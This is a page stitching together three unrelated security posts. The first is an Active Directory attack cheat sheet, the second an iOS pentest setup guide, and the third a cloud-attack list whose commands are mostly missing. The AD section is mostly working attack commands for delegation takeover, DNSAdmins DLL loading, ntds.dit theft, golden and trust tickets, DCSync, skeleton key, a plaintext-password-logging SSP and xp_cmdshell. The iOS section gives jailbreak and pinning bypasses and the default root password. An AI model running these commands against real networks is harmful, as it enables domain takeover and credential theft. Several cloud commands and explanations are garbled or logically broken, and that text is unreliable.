Tools we are going to use:

First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.

Exploitation Example:

#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose

#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid

#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'

#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt

#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$
 

Detailed Articles:

❗ In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.

#Command on Rubeus
Rubeus.exe tgtdeleg /nowrap
 

Detailed Article: Rubeus – Now With More Kekeo

DNSAdmins Abuse

WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work.

  1. Enumerate the members of the DNSAdmins group:
    • PowerView: Get-NetGroupMember -GroupName "DNSAdmins"
    • AD Module: Get-ADGroupMember -Identiny DNSAdmins
  2. Once we found a member of this group we need to compromise it (There are many ways).
  3. Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges:
  4. #Using dnscmd:
    dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
    
    #Restart the DNS Service:
    sc \\DNSServer stop dns
    sc \\DNSServer start dns
     

Abusing Active Directory-Integraded DNS

Abusing Backup Operators Group

WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.

  1. Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
  2. #Create a .txt file that will contain the shadow copy process script
    Script ->{
    set context persistent nowriters
    set metadata c:\windows\system32\spool\drivers\color\example.cab
    set verbose on
    begin backup
    add volume c: alias mydrive
    
    create
    
    expose %mydrive% w:
    end backup
    }
    
    #Execute diskshadow with our script as parameter
    diskshadow /s script.txt
     
  3. Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are going to use this amazing repo:
  4. #Importing both dlls from the repo using powershell
    Import-Module .\SeBackupPrivilegeCmdLets.dll
    Import-Module .\SeBackupPrivilegeUtils.dll
    
    #Checking if the SeBackupPrivilege is enabled
    Get-SeBackupPrivilege
    
    #If it isn't we enable it
    Set-SeBackupPrivilege
    
    #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
    Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
    
    #Dump the SYSTEM hive
    reg save HKLM\SYSTEM c:\temp\system.hive
     
  5. Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
  6. Use secretsdump.py from impacket and dump the hashes.
  7. Use psexec or another tool of your choice to PTH and get Domain Admin access.

Abusing Exchange

Weaponizing Printer Bug

Abusing ACLs

Abusing IPv6 with mitm6

SID History Abuse

WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of the SID History field on a kerberos TGT ticket, that defines the "extra" security groups and privileges.

Exploitation example:

#Get the SID of the Current Domain using PowerView
Get-DomainSID -Domain current.root.domain.local

#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local

#Create the Enteprise Admins SID
Format: RootDomainSID-519

#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi

#Inject the ticket into memory
kerberos::ptt \path\to\ticket\golden.kirbi

#List the DC of the Root Domain
dir \\dc.root.domain.local\C$

#Or DCsync and dump the hashes using mimikatz
lsadump::dcsync /domain:root.domain.local /all
 

Detailed Articles:

Exploiting SharePoint

Zerologon

PrintNightmare

Active Directory Certificate Services

Check for Vulnerable Certificate Templates with: Certify

Note: Certify can be executed with Cobalt Strike's execute-assembly command as well

.\Certify.exe find /vulnerable /quiet
 

Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.

This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus to forge authentication.

Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target.

Request the DA's Account Certificate with Certify

.\Certify.exe request /template:<Template Name> /quiet /ca:"<CA Name>" /domain:<domain.com> /path:CN=Configuration,DC=<domain>,DC=com /altname:<Domain Admin AltName> /machine
 

This should return a valid certificate for the associated DA account.

The exported cert.pem and cert.key files must be consolidated into a single cert.pem file, with one gap of whitespace between the END RSA PRIVATE KEY and the BEGIN CERTIFICATE.

Example of cert.pem:

-----BEGIN RSA PRIVATE KEY-----
BIIEogIBAAk15x0ID[...]
[...]
[...]
-----END RSA PRIVATE KEY-----

-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[...]
[...]
[...]
-----END CERTIFICATE-----
 

#Utilize openssl to Convert to PKCS #12 Format

The openssl command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 

Once the cert.pfx file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload functionality, etc.)

After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to request a Kerberos TGT for the DA account which will then be imported into memory.

.\Rubeus.exe asktht /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /ptt
 

This should result in a successfully imported ticket, which then enables an attacker to perform various malicious acitivities under DA user context, such as performing a DCSync attack.

No PAC

Domain Persistence

Golden Ticket Attack

#Execute mimikatz on DC as DA to grab krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName>

#On any machine:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:
<HashOfkrbtgtAccount>   id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
 

DCsync Attack

#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'

#DCsync using secretsdump.py from impacket with NTLM authentication
secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm

#DCsync using secretsdump.py from impacket with Kerberos Authentication
secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm
 

Tip:
/ptt -> inject ticket on current running session
/ticket -> save the ticket on the system for later use

Silver Ticket Attack

Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<TheTargetMachine> /service:
<ServiceType> /rc4:<TheSPN's Account NTLM Hash> /user:<UserToImpersonate> /ptt"'
 

SPN List

Skeleton Key Attack

#Exploitation Command runned as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN>

#Access using the password "mimikatz"
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
 

DSRM Abuse

WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!

#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>

#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Enter-PSSession -ComputerName <DC's Name>

#Alter the Logon behaviour on registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose

#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
 

Then just PTH to get local admin access on DC!

Custom SSP

WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!

From powershell:

#Get current Security Package:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty  'Security Packages'

#Append mimilib:
$packages += "mimilib"

#Change the new packages name
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages

#ALTERNATIVE:
Invoke-Mimikatz -Command '"misc::memssp"'
 

Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log

Cross Forest Attacks

Trust Tickets

WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT.

⚠️ The access we will have will be limited to what our DA account is configured to have on the other Forest!

  • Using Mimikatz:❗ Tickets -> .kirbi format
  • Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource!
  • #Dump the trust key
    Invoke-Mimikatz -Command '"lsadump::trust /patch"'
    Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
    
    #Forge an inter-realm TGT using the Golden Ticket attack
    Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:
    <OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:
    <PathToSaveTheGoldenTicket>"'
     
  • Using Rubeus:
  • .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
     

Abuse MSSQL Servers

  • Enumerate MSSQL Instances: Get-SQLInstanceDomain
  • Check Accessibility as current user:
  • Get-SQLConnectionTestThreaded
    Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
     
  • Gather Information about the instance: Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
  • Abusing SQL Database Links:
    WUT IS DIS?: A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust!

Check for existing Database Links:

#Check for existing Database Links:
#PowerUpSQL:
Get-SQLServerLink -Instance <SPN> -Verbose

#MSSQL Query:
select * from master..sysservers
 

Then we can use queries to enumerate other links from the linked Database:

#Manualy:
select * from openquery("LinkedDatabase", 'select * from master..sysservers')

#PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
Get-SQLServerLinkCrawl -Instance <SPN> -Verbose

#Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell
#Or if it is disabled enable it:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
 

Query execution:

Get-SQLServerLinkCrawl -Instace <SPN> -Query "exec master..xp_cmdshell 'whoami'"
 

Breaking Forest Trusts

WUT IS DIS?:
TL;DR
If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest.

Tools we are going to use:

Exploitation example:

#Start monitoring for TGTs with rubeus:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$

#Execute the printerbug to trigger the force authentication of the target DC to our machine
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local

#Get the base64 captured TGT from Rubeus and inject it into memory:
Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>

#Dump the hashes of the target domain using mimikatz:
lsadump::dcsync /domain:external.forest.local /all
 

Detailed Articles:

블로그 이미지

wtdsoul

,

https://kishorbalan.medium.com/start-your-first-ios-application-pentest-with-me-part-1-1692311f1902

 

Start your first iOS Application Pentest with me.. (Part- 1)

Hola Heckers,

kishorbalan.medium.com

 

 

1: Installing the required tools and Cydia tweaks

Note:- There are a plenty of different tools and methodologies when its coming to the iOS pentesting and I won’t be able to explain all of them, only my methodology will be shared here.

 

Prerequisites:

1: A Jailbroken iOS device

 

Setting up the lab and installing basic tools:

1: Hope you already have Frida and Objection tools in your system, If not , install them

Releases · frida/frida (github.com)

GitHub — sensepost/objection: 📱 objection — runtime mobile exploration

2: iTunes: We know iTunes will help us to work with iOS environments in several ways.

3: 3uTools: This one has a lot of useful features such as Direct SSH connection, Screen mirroring, iOS application installer, etc..

3uTools | The best all-in-one tool for iOS users

4: Cydia Application:- Basically, Cydia is a third-party application installer which is similar to the App Store and developed for the jailbroken iOS iDevices. If you are jailbreaking your device with Checkra1n or Uncover, The cydia app will automatically get installed into your device.

What if the Cydia haven’t installed during the jailbreak:

In case of Checkra1n, you can manually install the Cydia from the Checkra1n app.

 

In case of Uncover, you can enable the Reinstall Cydia option from the Uncover app settings and start jailbreaking.

After the jailbreaking process, the Cydia app can be found in the device.

 

Method for installing Tweaks on the Jailbroken iOS device:

1: With the help of Cydia

Step 1: Add the repo URL of the required cydia tweak in the source section

Step 2: After adding the Source, You can find search the tweak from the search section

Step 3: Select the tweak and install, Respring the device if it is needed.

2: Direct method:

Installing the Tweaks with their .deb files through the OpenSSH terminal

Step 1: Find the Tweak’s deb file from its source.

Step 2: Copy the file link and SSH to the iOS device as root user

Step 3: Download the deb file using wget

Step 4: Make the file executable with the permission command “chmod +x file.deb” and install it using “dpkg” command

Step 5: That’s it, Now the tweak will be installed on your device

Dependencies:

The following packages should be installed on the device:

  • Cydia Substrate
  • PreferenceLoader

Installing the required Cydia Tweaks:

Tweaks are basically third party applications which can be used to outrun some sort of fences set up in the target iOS applications. A lot of tweaks are available but here I am listing out the necessary ones.

A: Filza:

Repo: https://tigisoftware.com/cydia/

Filza is a file manager for exploring directories including root’s directories.

Filza also provides WebDav server so we can access the application on our other local machines.

B: App Sync Unified

Repo: https://cydia.akemi.ai/

The tweak helps to install IPA files which are ad-hoc signed, fakesigned, or unsigned.

C: IPA installer

Repo: http://apt.thebigboss.org/repofiles/cydia/

This one can be used to install/Backup IPA files directly to our jailbroken iOS device.

D: OpenSSH

Repo: http://apt.saurik.com/

We know why we need an OpenSSH feature. We can get a terminal access to our iOS device with root privileges.

Root credential: — root: alpine

E: Frida

Repo: https://build.frida.re/

To work with frida tools, a frida server must be installed on our iOS device.

F: Plutil

Repo: https://apt.bingner.com/

This tool can be used to read .plist files (Similar to xml files in android)

G: fsmon

Repo: GitHub — nowsecure/fsmon: monitor filesystem on iOS / OS X / Android / FirefoxOS / Linux

This is a FileSystem Monitor utility that can be used in environments such as Linux, Android and iOS.

 

Tweaks for Bypassing Jailbreak detection:

Following are the mostly used tweaks used for bypassing Jailbreak detections.

A: Liberty Lite

Repo: https://ryleyangus.com/repo/

B: A-Bypass

Repo: https://repo.co.kr/

C: HideJB

Repo: http://apt.thebigboss.org/repofiles/cydia/

D: Hestia

Repo: https://havoc.app/

E: iHide

Repo: https://repo.kc57.com/

 

Alternatively, You can use frida scripts to bypass the JB detection

Frida CodeShare

 

Tweaks for Bypassing SSL Pinning Bypass:

Following are the most used tweaks used for bypassing SSL certificate pinning.

A: SSL Kill Switch

Repo: https://julioverne.github.io/

B: SSLBypass

Repo: SSLBypass/packages at main · evilpenguin/SSLBypass · GitHub

 

Alternatively, You can use frida scripts to bypass the SSL pinning

Frida CodeShare

 

Note:- Most of the Jailbreak Detection Bypass and SSL Bypass tweaks can be found in the device settings after the installation.

 

So that’s it guys, We almost ready to go. We will kickstart on our first iOS application pentesting in the Part-2. If I have missed something in this part, we will cover ’em up in the next part. Stay tuned, Happy hacking :)

블로그 이미지

wtdsoul

,

https://redteamrecipe.com/60-Method-For-Cloud-Attacks/

 

60 Methods For Cloud Attacks(RTC0009)

60 Methods For Cloud Attacks

redteamrecipe.com

 

Insecure Interfaces and APIs

   
  1. --write-test: This option tells the script to write a test file. The purpose and content of the test file would depend on the implementation of the cloudhunter.py script.
  2. --open-only: This option specifies that the script should only check for open ports or services on the target URL, which in this case is http://example.com. It indicates that the script will not attempt to perform any other type of scanning or analysis.
  3. http://example.com: This is the target URL that the script will perform the open port check on. In this example, it is set to http://example.com, but in a real scenario, you would typically replace it with the actual URL you want to test.
   

By replacing <domain> with an actual domain name, the command would attempt to retrieve information specific to that domain using the cf enum tool. The details of what kind of information is gathered and how it is presented would depend on the specific implementation of the tool being used.

   
  • ffuf: This is the name of the tool or command being executed.
  • -w /path/to/seclists/Discovery/Web-Content/api.txt: This option specifies the wordlist (-w) to be used for fuzzing. The wordlist file, located at /path/to/seclists/Discovery/Web-Content/api.txt, contains a list of potential input values or payloads that will be tested against the target URL.
  • -u https://example.com/FUZZ: This option defines the target URL (-u) for the fuzzing process. The string FUZZ acts as a placeholder that will be replaced by the values from the wordlist during the fuzzing process. In this case, the target URL is https://example.com/FUZZ, where FUZZ will be substituted with different payloads from the wordlist.
  • -mc all: This option specifies the match condition (-mc) for the responses received from the target server. In this case, all indicates that all responses, regardless of the HTTP status code, will be considered as valid matches.
   

By providing the --bucket parameter followed by a specific value (gwen001-test002), the script will attempt to brute-force the Amazon S3 buckets using that particular value as the target. The script likely includes logic to iterate through different bucket names, trying each one until a valid or accessible bucket is found.

Data Breaches

   
  1. fd -t f -e txt . /path/to/data/breaches: This command uses the fd utility to search for files (-t f) with the extension .txt (-e txt) within the directory /path/to/data/breaches. The . represents the current directory. The fd command scans for files matching the specified criteria and outputs their paths.
  2. xargs ag -i "keyword": This command takes the output from the previous fd command and passes it as arguments to the ag command. xargs is used to convert the output into arguments. The ag command is a tool used for searching text files. The option -i enables case-insensitive matching, and "keyword" represents the specific keyword being searched for.

Insufficient Security Configuration

   

The purpose of the command seems to be to perform a takeover attempt on a domain. Domain takeover refers to the act of gaining control over a domain that is no longer actively maintained or properly configured, allowing an attacker to take control of its associated services or resources.

   
  1. fd -t f -e <file_extension> . /path/to/codebase: This command uses the fd utility to search for files (-t f) with a specific file extension (-e <file_extension>) within the directory /path/to/codebase. The . represents the current directory. The fd command scans for files matching the specified criteria and outputs their paths.
  2. xargs ag -i -C 3 "(default|weak|unrestricted|security settings)": This command takes the output from the previous fd command and passes it as arguments to the ag command. xargs is used to convert the output into arguments. The ag command is a tool used for searching text files. The options -i enable case-insensitive matching, and -C 3 specifies to show 3 lines of context around each match. The pattern "(default|weak|unrestricted|security settings)" represents a regular expression pattern to search for occurrences of any of the specified keywords within the files.

Insecure Data storage

   

By replacing <bucket_name> with the actual name of the S3 bucket and <object_key> with the key or path to the desired object within the bucket, the command will initiate the download process for that specific object. The downloaded object will typically be saved to the local file system, with the name and location depending on the behavior of the cf s3download tool.

   

By replacing <url> with the actual target URL, the command will initiate a directory scan on that specific URL using the cf dirscan tool. The tool will attempt to enumerate and list directories or paths within the target URL, providing information about the directory structure of the web application or website.

   
  1. gau -subs example.com: This command uses the gau tool to perform a subdomain discovery (-subs) on example.com. It retrieves a list of URLs associated with the specified domain, including subdomains.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the URLs obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. gf unsafe: This command uses the gf tool with the unsafe pattern to search for potential security-related issues in the HTTP responses. The gf tool allows you to filter and extract data based on predefined patterns.
  4. grep -iE "(encryption|access controls|data leakage)": This command uses grep to search for lines that match the specified case-insensitive (-i) extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “encryption,” “access controls,” or “data leakage” within the output obtained from the previous command.
   
  • ccat: This is the name of the tool or command being executed.
  • elasticsearch search: This part of the command indicates that the specific action being performed is a search operation in Elasticsearch.
  • <index>: This is a placeholder for the name of the Elasticsearch index on which the search operation will be performed. The actual index name should be provided in place of <index>.
  • <query>: This is a placeholder for the search query or criteria to be executed against the specified Elasticsearch index. The actual search query should be provided in place of <query>.

Lack of Proper Logging and Monitoring

   
  1. findomain -t example.com: This command uses the findomain tool to perform a subdomain discovery (-t) on example.com. It searches for subdomains associated with the specified domain and prints the results to the output.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. grep -E "(deployment|configuration management)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “deployment” or “configuration management” within the output obtained from the previous command.
   
  1. findomain -t example.com: This command uses the findomain tool to perform a subdomain discovery (-t) on example.com. It searches for subdomains associated with the specified domain and prints the results to the output.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. nuclei -t ~/nuclei-templates/ -severity high,medium -tags misconfiguration: This command uses the nuclei tool to perform vulnerability scanning or detection on the subdomains obtained from the previous command. The -t option specifies the path to the Nuclei templates directory (~/nuclei-templates/), which contains predefined templates for identifying security issues. The -severity option is used to specify the severity level of vulnerabilities to be detected, in this case, “high” and “medium.” The -tags option is used to filter templates with specific tags, in this case, “misconfiguration.”
   
  1. subfinder -d example.com: This command uses the subfinder tool to perform subdomain enumeration (-d) on example.com. It searches for subdomains associated with the specified domain and prints the results to the output.
  2. httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option is used to suppress verbose output, resulting in a cleaner output.
  3. gf misconfig: This command uses the gf tool with the misconfig pattern to search for potential misconfiguration issues in the HTTP responses. The gf tool allows you to filter and extract data based on predefined patterns.
  4. grep -E "(deployment|configuration management)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “deployment” or “configuration management” within the output obtained from the previous command.

Inadequate Incident Response and Recovery

   
  1. aws ec2 describe-instances: This command uses the AWS CLI (aws) to retrieve information about EC2 instances by executing the describe-instances API call. It provides details about the instances running in the specified AWS account.
  2. jq -r '.Reservations[].Instances[] | select(.State.Name!="terminated") | select(.State.Name!="shutting-down") | select(.State.Name!="stopping") | select(.State.Name!="stopped") | select(.State.Name!="running")': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query filters instances based on their state, excluding instances that are terminated, shutting down, stopping, stopped, or running.
  3. grep -iE "(incident response|recovery)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. az vm list --output json: This command uses the Azure CLI (az) to retrieve a list of virtual machines (VMs) by executing the vm list command. The --output json option specifies the output format as JSON.
  2. jq '.[] | select(.powerState != "stopped" and .powerState != "deallocated")': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects VMs that have a powerState different from “stopped” and “deallocated”, meaning they are in an active or running state.
  3. grep -iE "(incident response|recovery)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. gcloud compute instances list --format json: This command uses the Google Cloud SDK (gcloud) to retrieve a list of compute instances by executing the compute instances list command. The --format json option specifies the output format as JSON.
  2. jq '.[] | select(.status != "TERMINATED") | select(.status != "STOPPING") | select(.status != "SUSPENDED")': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects instances that have a status different from “TERMINATED”, “STOPPING”, or “SUSPENDED”, meaning they are in an active or running state.
  3. grep -iE "(incident response|recovery)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The -i option enables case-insensitive matching.

Shared Technology Vulnerabilities

   
  • nmap -p0-65535: This command starts the nmap tool with the specified options to scan all ports from 0 to 65535 on the target system.
  • --script vulners,vulscan: This option instructs nmap to use the vulners and vulscan scripts for vulnerability scanning. These scripts are part of the Nmap Scripting Engine (NSE) and help identify potential vulnerabilities in the target system.
  • --script-args vulscanoutput=gnmap: This option specifies additional arguments for the selected scripts. In this case, it sets the vulscanoutput argument to gnmap, which specifies the output format for the vulscan script as gnmap.
  • -oN -: This option redirects the output of the nmap command to the standard output (stdout) instead of saving it to a file.
  • <target>: This is a placeholder for the target IP address or hostname. The actual target should be provided in place of <target>.
  • grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command pipes the output of the nmap command into grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” in a case-insensitive manner (-i option).
   
  1. java -jar burpsuite_pro.jar --project-file=<project_file> --unpause-spider-and-scanner --scan-checks --results-dir=<output_directory>: This command executes the Burp Suite Professional edition by running the JAR file (burpsuite_pro.jar) using Java. The --project-file option specifies the path to a Burp Suite project file, which contains configuration settings and previous scan results. The --unpause-spider-and-scanner option unpauses the spider and scanner modules to start the crawling and vulnerability scanning process. The --scan-checks option enables all active scanning checks. The --results-dir option specifies the directory where the scan results will be saved.
  2. grep -iE "(shared technology|underlying infrastructure|hypervisor)" <output_directory>/*.xml: This command uses grep to search for lines that match the specified extended regular expression (-E) within XML files in the specified output directory. The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” in a case-insensitive manner (-i option).
   
  1. omp -u <username> -w <password> --xml="<get_results task_id='<task_id>'/>": This command uses the OpenVAS Management Protocol (OMP) tool to retrieve scan results. The -u option specifies the username, -w option specifies the password, and --xml option specifies the XML command to send to the OpenVAS server. The <get_results task_id='<task_id>'/> XML command requests the scan results for a specific task ID.
  2. grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” within the output obtained from the previous command. The -i option enables case-insensitive matching.

Account Hijacking and Abuse

   
  1. aws iam list-users: This command uses the AWS CLI (aws) to list all IAM users in the AWS account by executing the iam list-users API call. It retrieves information about the IAM users.
  2. jq -r '.Users[] | select(.PasswordLastUsed == null)': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects IAM users that have a PasswordLastUsed value equal to null, indicating that they have never used a password to authenticate.
  3. grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. az ad user list --output json: This command uses the Azure CLI (az) to list all Azure Active Directory (AD) users in the current directory by executing the ad user list command. The --output json option specifies the output format as JSON.
  2. jq '.[] | select(.passwordLastChanged == null)': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects AD users that have a passwordLastChanged value equal to null, indicating that they have never changed their password.
  3. grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. gcloud auth list --format=json: This command uses the Google Cloud SDK (gcloud) to list all authenticated accounts in the current configuration. The --format=json option specifies the output format as JSON.
  2. jq -r '.[] | select(.status == "ACTIVE") | select(.credential_last_refreshed_time.seconds == null)': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects authenticated accounts that have an “ACTIVE” status and a credential_last_refreshed_time.seconds value equal to null, indicating that their credentials have not been refreshed.
  3. grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The -i option enables case-insensitive matching.

Retrieve EC2 Password Data

   
